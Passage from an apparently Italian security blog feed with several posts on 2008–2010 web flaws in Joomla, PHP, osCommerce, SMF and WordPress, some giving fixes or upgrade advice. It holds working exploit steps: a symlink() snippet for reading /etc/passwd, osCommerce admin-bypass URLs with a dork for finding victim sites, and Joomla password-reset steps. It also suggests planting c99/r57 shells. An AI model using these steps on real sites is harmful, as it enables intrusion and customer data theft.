<p><a href="http://www.capn3m0.org/wp-content/uploads/2010/10/joomla-hack1.png" rel="lightbox[386]" title="Joomla"><img class="alignleft size-thumbnail wp-image-387" title="Joomla" src="http://www.capn3m0.org/wp-content/uploads/2010/10/joomla-hack1-150x150.png" alt="[EXPLOIT]   Joomla all versions XSS vulnerability" width="150" height="150" /></a>Ciao a tutti, dopo diverso tempo dall&#8217;ultimo post pubblico una vulnerabilità che potrà creare non pochi problemi agli utilizzatori del noto <strong><a href="http://www.joomla.org" target="_blank">Cms Joomla</a></strong>.</p>
<p>E&#8217; stata pubblicata da poco una vulnerabilità di tipo <strong>XSS</strong> per tutte le versioni <strong>&lt; =1.5.20</strong>, ossia <strong>tutte le versioni attualmente pubblicate</strong>.</p>
<p>Tale exploit sfrutta una falla nella verifica delle variabili GET encodate eseguendo quindi il codice Javascript che si passa all&#8217;applicativo.</p>
<p><a href="http://seclists.org/fulldisclosure/2010/Oct/109" target="_blank">Full Discolsure Advisories</a></p>
<p>Al seguente video si potrà vedere un Proof of Concept dell&#8217;attacco Xss.</p>
<p><a href="http://yehg.net/lab/pr0js/training/view/misc/joomla-1.5.20_encoded-xss/">Proof of Concept by yehg.net</a></p>
<p><span id="more-386"></span></p>
<p>Un malintenzionato potrebbe sfruttare tale falla per rubare i cookie degli utenti loggati, Administrator compreso, e sfruttarli per modificare pagine o uploadare shell malevole che permetterebbero qualsiasi operazione nello spazio del sito vittima. Una volta rubati i cookie di Admin, infatti, basterà andare nella pagina di edit di uno dei template di default, di solito &#8216;beez&#8217;, e successivamente editare la pagina con il codice di una shell php quali <strong>c99</strong> o <strong>r57</strong>.</p>
<p>Provvedero&#8217; ad aggiornare il post quanto prima con tutti i riferimenti e i dettagli (sono in treno con l&#8217;app WordPress per Blackberry <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_smile.gif' alt="[EXPLOIT]   Joomla all versions XSS vulnerability" class='wp-smiley' title="[EXPLOIT]   Joomla all versions XSS vulnerability pics" />  ).</p>
<p><strong>AGGIORNAMENTO #1</strong><br />
 Lo staff di Joomla ha provveduto a rilasciare la nuova versione dove tale problema e&#8217; stato fixato.</p>
<p>Chiunque utilizzi questo Cms e&#8217; invitato ad <strong>effettuare l&#8217;upgrade alla versione 1.5.21</strong></p>
<p><a href="http://www.joomla.org/announcements/release-news/5300-joomla-1521-released.html" target="_blank">Joomla 1.5.21 &#8211; Official Site</a></p>
<p><a href="http://developer.joomla.org/security/news/9-security/10-core-security/322-20101001-core-xss-vulnerabilities.html" target="_blank">Joomla Security News</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-joomla-all-versions-xss-vulnerability.html/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>PHP 5.2.12/5.3.1 symlink() open_basedir bypass</title>
		<link>http://www.capn3m0.org/php-5.2.125.3.1-symlink-open_basedir-bypass.html</link>
		<comments>http://www.capn3m0.org/php-5.2.125.3.1-symlink-open_basedir-bypass.html#comments</comments>
		<pubDate>Wed, 06 Jan 2010 22:10:50 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=367</guid>
		<description><![CDATA[Sebbene in ritardo rispetto alla data di pubblicazione di questo Exploit (13/11/2009) oggi vi parlerò di una grave falla individuata nelle versioni 5.2.12/5.3.1 del Php che sfruttando delle falle strutturali delle funzioni symlink() permette di bypassare il check dei permessi della funzione open_basedir. Di fatto questa vulnerabilità da la possibilità di leggere aree/file del WebServer [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2010/01/php.jpg" rel="lightbox[367]" title="Php"><img class="alignleft size-thumbnail wp-image-368" title="Php" src="http://www.capn3m0.org/wp-content/uploads/2010/01/php-150x150.jpg" alt="PHP 5.2.12/5.3.1 symlink() open basedir bypass " width="150" height="150" /></a>Sebbene in ritardo rispetto alla data di pubblicazione di questo Exploit (13/11/2009) oggi vi parlerò di una grave falla individuata nelle versioni <strong>5.2.12/5.3.1 del Php</strong> che sfruttando delle falle strutturali delle funzioni <strong>symlink()</strong> permette di bypassare il check dei permessi della funzione open_basedir.</p>
<p>Di fatto questa <strong>vulnerabilità</strong> da la possibilità di leggere aree/file del WebServer non autorizzate quali il file &#8220;<strong>/etc/passwd</strong>&#8221; e similari.</p>
<p>L&#8217;applicazione pratica e più semplice di tale vulnerabilità è il seguente codice:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">&lt;</span> ?php
 <span style="color: #990000;">symlink</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;/etc/passwd&quot;</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">&quot;prova.txt&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
 <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></div></div>

<p><span>Se il &#8220;safe_mode&#8221; del Php era disabilitato nel proprio spazio sarebbe stato creato un link simbolico dal nome &#8220;prova.txt&#8221; che puntava al contenuto di &#8220;/etc/passwd&#8221;. In questo modo richiamando dal browser il link simbolico nel seguente modo:</span></p>
<p><cite><span>http://&lt;dominio&gt;/prova.txt</span></cite></p>
<p><span>avremmo visualizzato a video il contenuto del file &#8220;/etc/passwd&#8221;. A seconda dell&#8217;Hosting questo file può contenere anche le password dell&#8217;account web del Cliente e pertanto la gravità della vulnerabilità è elevata.</span></p>
<p><span>Nel caso, invece, il safe_mode del Php fosse stato attivo sarebbe stato visualizzato un messaggio di errore che indicava l&#8217;impossibilità di eseguire l&#8217;operazione a causa della mancanza dei permessi di accesso al file &#8220;/etc/passwd&#8221;.</span></p>
<p>Ho provato ad applicare questa tecnica su diversi Hosting dove ho sitarelli o spazi per fare dei test e in base ad alcune configurazioni di sicurezza (privilegi, followsymlink,etc.) si poteva o meno accedere a dati sensibili come, per esempio, visualizzare i file di configurazione di altri domini presenti sullo stesso server dove siamo noi.</p>
<p>Questa <strong>vulnerabilità</strong> del Php ha fatto nascere alcune discussioni legate ai vari <strong>attacchi di massa</strong> che si sono verificati lo scorso anno su vari Hosting condivisi noti e meno noti. Dal mio punto di vista è plausibile pensare, quindi, che questa falla abbia dato la possibilità di accedere e violare centinaia di spazi Web rubando informazioni preziose per eventuali ulteriori attacchi.</p>
<p>Link correlati:</p>
<p><a href="http://www.exploit-db.com/exploits/10557" target="_blank"><strong>Exploit</strong></a></p>
<p><a href="http://securityreason.com/achievement_exploitalert/14" target="_blank"><strong>PHP 5.2.12/5.3.1 symlink() open_basedir bypass &#8211; SecurityReason.com</strong></a></p>
<p><a href="http://sicurezza.html.it/articoli/leggi/1007/tecniche-symlink-attack/" target="_blank"><strong>Symlink Attack &#8211; HTML.it</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/php-5.2.125.3.1-symlink-open_basedir-bypass.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT - POC] &#8211; osCommerce 2.2 RC2 Authentication Bypass</title>
		<link>http://www.capn3m0.org/exploit-poc-oscommerce-2.2-rc2-authentication-bypass.html</link>
		<comments>http://www.capn3m0.org/exploit-poc-oscommerce-2.2-rc2-authentication-bypass.html#comments</comments>
		<pubDate>Wed, 18 Nov 2009 20:28:26 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[authentication bypass]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack oscommerce]]></category>
		<category><![CDATA[osCommerce 2.2 RC2]]></category>
		<category><![CDATA[proof of concept]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=342</guid>
		<description><![CDATA[Lo scorso 13 Novembre Stuart Udall ha segnalato una nuova vulnerabilità per il noto ma allo stesso tempo abbandonato osCommerce RC 2.2 che consente di accedere ad alcune sezioni dell&#8217;Area Amministrativa senza aver bisogno di alcuna login e password. Come potrete verificare personalmente tramite questo Proof Of Concept basterà richiamare l&#8217;url dell&#8217;Area Admin con una [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/oscommerce.gif" rel="lightbox[342]" title="osCommerce"><img class="alignleft size-thumbnail wp-image-343" title="osCommerce" src="http://www.capn3m0.org/wp-content/uploads/2009/11/oscommerce-150x60.gif" alt="[EXPLOIT   POC]   osCommerce 2.2 RC2 Authentication Bypass" width="150" height="60" /></a>Lo scorso 13 Novembre Stuart Udall ha segnalato una nuova <strong>vulnerabilità</strong> per il noto ma allo stesso tempo abbandonato <strong>osCommerce RC 2.2</strong> che consente di accedere ad alcune sezioni dell&#8217;Area Amministrativa senza aver bisogno di alcuna login e password.</p>
<p>Come potrete verificare personalmente tramite questo <strong>Proof Of Concept</strong> basterà richiamare l&#8217;url dell&#8217;Area Admin con una particolare sintassi e il gioco è fatto e <strong>si potranno visionare gli ordini, i clienti, le email</strong>.</p>
<p>Già verso agosto fu scoperta una grave falla nel meccanismo di autenticazione che consentiva, tramite opportune interrogazioni HTTP (http request) di <strong>eseguire comandi lato server</strong> e, sfruttando alcuni file dell&#8217;osCommerce stesso,  di uploadare file, shell etc.</p>
<p>Per maggiori informazioni circa questa vulnerabilità andate a questo <a href="http://secunia.com/advisories/33446/" target="_blank"><strong>link</strong></a>.</p>
<p>Per quanto riguarda la falla di cui vi parlo oggi vi illustro di seguito come sfruttarla e quali informazioni si possono ottenere. Per prima cosa è necessario trovare un &#8220;<strong>sito vittima</strong>&#8220;  e per fare questo ci viene incontro, ancora una volta, <a href="http://www.google.com/" target="_blank"><strong>Google</strong></a>!</p>
<p><span id="more-342"></span>Cercate su Google la seguente stringa:</p>
<p><cite>&#8220;Powered by OsCommerce&#8221;</cite></p>
<p>(compresa di virgolette)</p>
<p style="text-align: center;"><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/google_search.PNG" rel="lightbox[342]" title="Dork OsCommerce"><img class="size-thumbnail wp-image-344 aligncenter" title="Dork OsCommerce" src="http://www.capn3m0.org/wp-content/uploads/2009/11/google_search-150x68.PNG" alt="[EXPLOIT   POC]   osCommerce 2.2 RC2 Authentication Bypass" width="150" height="68" /></a></p>
<p>In questo modo il Motore di Ricerca ci mostrerà solo i siti che contengono esattamente quella frase e, quindi, con molta probabilità siti basati su <strong>OsCommerce</strong>.</p>
<p>A questo punto aprite qualche sito e verificate se richiamando l&#8217;area &#8220;admin&#8221; vi viene mostrata correttamente la pagina di login.</p>
<p>L&#8217;area admin di default è raggiungibile al seguente url:</p>
<p><cite>http://&lt;dominio_con_oscommerce&gt;/admin</cite></p>
<p>Se l&#8217;Admin non ha cambiato il nome della cartella vi apparirà una schermata simile a questa.</p>
<p style="text-align: center;"><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/adminoscommerce.PNG" rel="lightbox[342]" title="Admin Login OsCommerce"><img class="size-thumbnail wp-image-345 aligncenter" title="Admin Login OsCommerce" src="http://www.capn3m0.org/wp-content/uploads/2009/11/adminoscommerce-150x150.PNG" alt="[EXPLOIT   POC]   osCommerce 2.2 RC2 Authentication Bypass" width="150" height="150" /></a></p>
<p>A questo punto si sfrutterà la vulnerabilità nell&#8217;autenticazione per <strong>bypassarla</strong> semplicemente digitando i seguenti url:</p>
<p>/admin/orders.php/login.php<br />
 /admin/mail.php/login.php<br />
 /admin/mail.php/login.php?fooled<br />
 /admin/mail.php/login.php?action=send_email_to_user</p>
<p>Cosa succede richiamando questi url? (a voi scoprirlo!)</p>
<p>Si accederà in visualizzazione alle funzionalità di quei file e quindi, nell&#8217;esempio citato sopra, <strong>si potranno leggere gli ordini e vedere i clienti con le relative email</strong>.</p>
<p>Questo articolo è solamente un Proof Of Concept e pertanto non deve portare ad alcuna azione malevola.</p>
<p>Per chi utilizza <strong>OsCommerce</strong> consiglio o di valutare il passaggio a tutt&#8217;altro applicativo, visto anche che il progetto è ormai fermo, oppure di andare sul Forum di OsCommerce dove suggeriscono una semplice ma efficace (?) fix al problema.</p>
<p>Link correlati:</p>
<p><strong><a href="http://seclists.org/fulldisclosure/2009/Nov/169" target="_blank">OS Commerce authentication bypass by Stuart Udall</a></strong></p>
<p><a href="http://forums.oscommerce.com/topic/348589-serious-hole-found-in-oscommerce" target="_blank"><strong>Post dal Forum di OsCommerce</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-poc-oscommerce-2.2-rc2-authentication-bypass.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Rilasciato WordPress 2.8.6 per correggere 2 falle di sicurezza!</title>
		<link>http://www.capn3m0.org/rilasciato-wordpress-2.8.6-per-correggere-2-falle-di-sicurezza.html</link>
		<comments>http://www.capn3m0.org/rilasciato-wordpress-2.8.6-per-correggere-2-falle-di-sicurezza.html#comments</comments>
		<pubDate>Fri, 13 Nov 2009 08:54:53 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[security release]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=331</guid>
		<description><![CDATA[Dopo il tanto parlare degli ultimi giorni circa la possibilità che gli attacchi hacker avvenissero grazie a falle presenti in WordPress 2.8.5, rilasciato neanche un mese fa, è stata appena annunciata la security release 2.8.6 che contiene due importati fix di sicurezza. La prima è una vulnerabilità del componente &#8220;Press This&#8221; (Pubblicalo in italiano) scoperta [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/img_wp.JPG" rel="lightbox[331]" title="Wordpress 2.8.6"><img class="alignleft size-thumbnail wp-image-333" title="Wordpress 2.8.6" src="http://www.capn3m0.org/wp-content/uploads/2009/11/img_wp-150x150.jpg" alt="Rilasciato WordPress 2.8.6 per correggere 2 falle di sicurezza!" width="150" height="150" /></a>Dopo il tanto parlare degli ultimi giorni circa la possibilità che gli <a href="http://www.capn3m0.org/hack-cannot-redeclare-security_update.html" target="_self"><strong>attacchi hacker</strong></a> avvenissero grazie a falle presenti in <strong>WordPress 2.8.5</strong>, rilasciato neanche un mese fa, è stata appena annunciata la <a href="http://wordpress.org/development/2009/11/wordpress-2-8-6-security-release/" target="_blank"><strong>security release 2.8.6</strong></a> che contiene due importati fix di sicurezza.</p>
<p>La prima è una vulnerabilità del componente &#8220;Press This&#8221; (Pubblicalo in italiano) scoperta da Benjamin Flesch che permetteva di eseguire <a href="http://it.wikipedia.org/wiki/Cross-site_scripting" target="_blank"><strong>XSS (Cross Site Scripting)</strong></a> agli utenti registrati con privilegi di pubblicazione.</p>
<p>La seconda, invece, è stata scoperta da Dawid Golunski e consentiva di<strong> aggirare le limitazioni ai nomi dei file in determinate configurazioni Apache.</strong></p>
<p>In attesa della versione <strong>WordPress 2.9</strong> consiglio a tutti di provvedere ad aggiornare la propria versione tramite la funzione di &#8220;Aggiornamento Automatico&#8221; che verrà suggerita non appena entrerete nella vostra Bacheca.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/rilasciato-wordpress-2.8.6-per-correggere-2-falle-di-sicurezza.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[HACK] &#8211; Cannot redeclare security_update(), alla fine è arrivato!</title>
		<link>http://www.capn3m0.org/hack-cannot-redeclare-security_update.html</link>
		<comments>http://www.capn3m0.org/hack-cannot-redeclare-security_update.html#comments</comments>
		<pubDate>Sat, 07 Nov 2009 23:21:27 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[HTML/Crypted.gen]]></category>
		<category><![CDATA[infezione]]></category>
		<category><![CDATA[ob_start(”security_update”)]]></category>
		<category><![CDATA[security_update]]></category>
		<category><![CDATA[sito malevolo]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=325</guid>
		<description><![CDATA[PREMESSA Il 9 febbraio scorso nel post titolato &#8220;18446744073709551615 – Un nuovo hack in arrivo?&#8221; avevo descritto un hacking che stava avvenendo in centinaia di siti di hosting italiani e stranieri che non aveva un apparente denominatore comune. Infatti all&#8217;epoca non si spiegava se venivano sfruttate vulnerabilità dell&#8217;applicativo in uso sul proprio dominio (in Rete [...]]]></description>
			<content:encoded><![CDATA[<h2><img class="size-thumbnail wp-image-327 alignleft" title="Hacking" src="http://www.capn3m0.org/wp-content/uploads/2009/11/bio-150x150.jpg" alt="[HACK]   Cannot redeclare security update(), alla fine è arrivato!" width="150" height="150" />PREMESSA</h2>
<p>Il 9 febbraio scorso nel post titolato &#8220;<a href="http://www.capn3m0.org/18446744073709551615-un-nuovo-hack-in-arrivo.html" target="_self"><strong>18446744073709551615 – Un nuovo hack in arrivo?</strong></a>&#8221; avevo descritto un <strong>hacking </strong>che stava avvenendo in centinaia di siti di hosting italiani e stranieri che non aveva un apparente denominatore comune.</p>
<p>Infatti all&#8217;epoca non si spiegava se venivano sfruttate <strong>vulnerabilità dell&#8217;applicativo</strong> in uso sul proprio dominio (in <a href="http://www.juliusdesign.net/wordpress-2-8-5-attacco-haked-su-aruba/" target="_blank"><strong>Rete</strong></a> in questi ultimi giorni c&#8217;è un gran parlare sulla possibilità che sia <strong>WordPress</strong> la causa) o se si trattasse di uno <strong>stealing di account</strong> ma alla luce di quanto analizzato a febbraio e quanto analizzato in questi giorni vi sono in rete diverse &#8220;testimonianze&#8221; di siti hackerati che con molta probabilità non hanno vulnerabilità in quanto basati su semplici <strong>pagine html statiche</strong>.</p>
<p>Alcune &#8220;vittime&#8221; mi han contattato privatamente e mi hanno fornito informazioni per poter delineare meglio questo hack.</p>
<p>Ricordo a chi legge questo Blog per la prima volta che nel <a href="http://www.capn3m0.org/18446744073709551615-un-nuovo-hack-in-arrivo.html" target="_self">post precedente </a>chiamato volutamente &#8220;Un nuovo hack in arrivo?&#8221; segnalavo come le azioni di febbraio apparivano più come un &#8220;giro di test&#8221; che come un&#8217;azione a fini malevoli quale è, invece, in questi giorni. A febbraio numerosi siti subirono un <strong>hack atipico </strong>poiché i siti vittima non venivano alterati o infettati da virus/trojan ma, semplicemente, mostravano il numero &#8220;<strong>18446744073709551615</strong>&#8221; a pié di pagina e nel codice si poteva individuare la dichiarazione di una funzione dal nome &#8220;<strong>ob_start(&#8220;security_update&#8221;)</strong>&#8220;. Questo, dal mio punto di vista, poteva essere interpretato come un marcatore tramite il quale chi attacca può farsi un&#8217;idea di quanti potenziali vittime potrebbe colpire.</p>
<p><span id="more-325"></span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/hack-cannot-redeclare-security_update.html/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT/FIX] Php-Stats 0.1.9.2 Multiple Vulnerabilities Exploit</title>
		<link>http://www.capn3m0.org/exploitfix-php-stats-0192-multiple-vulnerabilities-exploit.html</link>
		<comments>http://www.capn3m0.org/exploitfix-php-stats-0192-multiple-vulnerabilities-exploit.html#comments</comments>
		<pubDate>Sat, 11 Oct 2008 23:20:51 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[code execution]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Milworm]]></category>
		<category><![CDATA[php stats]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=98</guid>
		<description><![CDATA[In questi giorni sto lavorando ad un &#8220;caso&#8221; di hacking che sta infettando un discreto numero di persone e facendo i soliti controlli mi sono imbattuto in una serie di vulnerabilità che affliggono il famoso script di statistiche Php-Stats 0.1.9.2 (utilizzato anche in questo Blog). Le vulnerabilità sono di due tipi: Blind SQL Injection e [...]]]></description>
			<content:encoded><![CDATA[<p>In questi giorni sto lavorando ad un &#8220;caso&#8221; di hacking che sta infettando un discreto numero di persone e facendo i soliti controlli mi sono imbattuto in una serie di vulnerabilità che affliggono il famoso script di statistiche <a href="http://php-stats.com/" target="_blank"><strong>Php-Stats 0.1.9.2</strong></a> (utilizzato anche in questo Blog).</p>
<p><span id="more-98"></span></p>
<p>Le vulnerabilità sono di due tipi: <a href="http://en.wikipedia.org/wiki/SQL_injection#Blind_SQL_Injection" target="_blank"><strong>Blind SQL Injection</strong></a> e <a href="http://en.wikipedia.org/wiki/Arbitrary_code_execution" target="_blank"><strong>Remote Code Execution</strong></a>.</p>
<p>Tale vulnerabilità è stata riportata da <a href="http://www.milw0rm.com" target="_blank"><strong>Milworm</strong></a> e <a href="http://www.milw0rm.com/exploits/4513" target="_blank"><strong>questo</strong></a> è l&#8217;indirizzo dell&#8217;Exploit.</p>
<p><a href="mailto:n0b0d13s@gmail.com "><strong>Egix</strong></a>, lo scopritore di tale vulnerabilità riporta anche un fix da applicare al file &#8220;<strong>php-stats.recjs.php</strong>&#8221; al fine di correggere tale falla di sicurezza.</p>
<p>Per fixare il vostro <strong>Php-Stats</strong> aprite il file &#8220;<strong>php-stats.recjs.php</strong>&#8221; e posizionatevi alla <strong>Riga 94</strong>. Troverete il seguente codice:</p>
<blockquote><p><strong>if(isset($_GET['ip'])) $ip=urldecode($_GET['ip']); else break;</strong></p>
</blockquote>
<p>che andrà sostituito con questo:</p>
<blockquote><p><strong>if(isset($_GET['ip'])) $ip=intval(urldecode($_GET['ip'])); else break;</strong></p>
</blockquote>
<p>Come sempre eccovi il file già fixato:</p>
<p><strong><a href="http://www.capn3m0.org/wp-content/uploads/2008/10/php-statsrecjs.rar">Fix Php-Stats 0.1.9.2</a></strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploitfix-php-stats-0192-multiple-vulnerabilities-exploit.html/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>[VULN/EXPLOIT] SMF 1.1.6 Filter Post Bypass &#8211; Milw0rm</title>
		<link>http://www.capn3m0.org/vulnerabilita-exploit-smf-116-filter-post-bypass-milw0rm.html</link>
		<comments>http://www.capn3m0.org/vulnerabilita-exploit-smf-116-filter-post-bypass-milw0rm.html#comments</comments>
		<pubDate>Sun, 05 Oct 2008 00:05:59 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[milw0rm]]></category>
		<category><![CDATA[simple machine forum]]></category>
		<category><![CDATA[smf]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[WHK]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=96</guid>
		<description><![CDATA[E&#8217; stata pubblicata da poco (4/10/2008) una vulnerabilità scoperta nella versione 1.1.6 di Simple Machine Forum (o SMF) che permette di bypassare il Filtro che viene applicato al contenuto del post dando la possibilità di scrivere parole censurate, url di siti correttamente funzionanti e visibili, etc. Questo l&#8217;Exploit pubblicato su Milw0rm: Name: SMF 1.1.6 Filter [...]]]></description>
			<content:encoded><![CDATA[<p>E&#8217; stata pubblicata da poco (4/10/2008) una vulnerabilità scoperta nella versione <strong>1.1.6</strong> di <strong><a href="http://www.simplemachines.org/" target="_blank">Simple Machine Forum</a> (o SMF)</strong> che permette di <strong>bypassare</strong> il Filtro che viene applicato al contenuto del post dando la possibilità di scrivere parole censurate, url di siti correttamente funzionanti e visibili, etc.</p>
<p><span id="more-96"></span></p>
<p><a href="http://www.milw0rm.com/exploits/6665" target="_blank">Questo</a> l&#8217;Exploit pubblicato su <a href="http://www.milw0rm.com/" target="_blank"><strong>Milw0rm</strong></a>:</p>
<blockquote><p>Name: SMF 1.1.6 Filter Post Bypass<br />
 Author: WHK<br />
 WebSite: http://www.jccharry.com/</p>
<p>en{<br />
 The data in a post are not filtered properly when someone enters<br />
 statements BBCode wrong without content that a user can enter<br />
 words banned by the system of restrictions by allowing expose<br />
 SPAM content, and so on.<br />
 }</p>
<p>es{<br />
 Los datos en un post no son filtrados adecuadamente cuando alguien<br />
 ingresa declaraciones bbcode sin contenido probocando que un<br />
 usuario pueda ingresar palabras prohibidas por el sistema de<br />
 restricciones permitiendo exponer contenido SPAM, etc.<br />
 }</p>
<p>Example of a post / Ejemplo de un post:</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
 [color=red][size=20pt]Fu[url][/url]ck you admin![/size][/color]</p>
<p>My SPAM: [b]ht[b][/b]tp://www.jc[i][/i]charry.com/[/b] &gt;:D<br />
 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>Demo:</p>
<p>http://www.jccharry.com/archivos_publicos/smf_filter_post_bypass.png</p>
<p># milw0rm.com [2008-10-04]</p>
</blockquote>
<p>Viene spiegato che &#8220;<em>&#8230;i dati in un post non vengono filtrati correttamente quando vengono inseriti alcuni tag BBCode errati permettendo così di inserire parole (o tutto ciò che è ritenuto SPAM) bypassando il Filtro AntiSpam..</em>&#8220;.</p>
<p>L&#8217;autore dell&#8217;exploit, tale <a href="http://www.jccharry.com/ " target="_blank"><strong>WHK</strong></a>, allega poi l&#8217;immagine seguente dove riporta sia il metodo con cui ha inserito il testo ed i BBcode nel Post, sia il risultato finale.</p>
<div id="attachment_97" class="wp-caption alignnone" style="width: 310px"><a href="http://www.capn3m0.org/wp-content/uploads/2008/10/smf_filter_post_bypass.png" rel="lightbox[96]" title="smf_filter_post_bypass"><img class="size-medium wp-image-97" title="smf_filter_post_bypass" src="http://www.capn3m0.org/wp-content/uploads/2008/10/smf_filter_post_bypass-300x248.png" alt="[VULN/EXPLOIT] SMF 1.1.6 Filter Post Bypass   Milw0rm" width="300" height="248" /></a><p class="wp-caption-text">Esempio pubblicato dall&#39;autore</p></div>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/vulnerabilita-exploit-smf-116-filter-post-bypass-milw0rm.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] Joomla 1.5.x Remote Admin Password Change</title>
		<link>http://www.capn3m0.org/joomla-15x-remote-admin-password-change.html</link>
		<comments>http://www.capn3m0.org/joomla-15x-remote-admin-password-change.html#comments</comments>
		<pubDate>Sun, 14 Sep 2008 16:26:35 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Programmazione]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[defacement]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[joomla 1.5 vulnerabilities]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[script php cms]]></category>
		<category><![CDATA[security exploit]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/2008/09/joomla-15x-remote-admin-password-change/</guid>
		<description><![CDATA[In data 12 Agosto è stata scoperta una vulnerabilità del Cms Joomla versioni inferiori alla 1.5.6 che consente di sfruttare il componente &#8220;com_user&#8221; per editare a proprio piacimento la password di Administrator e, quindi, di sfruttare l&#8217;accesso Admin per eseguire defacement e simili. Al link seguente troverete l&#8217;annuncio ufficiale: http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html Questo, invece, quello dal Sito [...]]]></description>
			<content:encoded><![CDATA[<p>In data 12 Agosto è stata scoperta una vulnerabilità del Cms Joomla versioni inferiori alla 1.5.6 che consente di sfruttare il componente &#8220;com_user&#8221; per editare a proprio piacimento la password di Administrator e, quindi, di sfruttare l&#8217;accesso Admin per eseguire defacement e simili.</p>
<p>Al link seguente troverete l&#8217;annuncio ufficiale:</p>
<p><a href="http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html" target="_blank">http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html</a></p>
<p>Questo, invece, quello dal Sito Italiano:</p>
<p><a href="http://www.joomlaitalia.com/content/view/323/90/" target="_blank">http://www.joomlaitalia.com/content/view/323/90/</a></p>
<p><span id="more-3"></span>Sfruttare tale vulnerabilità risulta alquanto semplice poiché bastano pochi semplici passaggi per eseguire il reset:</p>
<p>1) Una volta individuato il Sito in Joomla caricare questo Url:</p>
<blockquote><p>/index.php?option=com_user&amp;view=reset&amp;layout=confirm</p>
</blockquote>
<p>2) A questo punto apparirà un form che chiederà l&#8217;inserimento di un codice che, teoricamente, avreste dovuto ricevere in mail</p>
<p>3) Inserite l&#8217;apice (&#8216;) come carattere continuate</p>
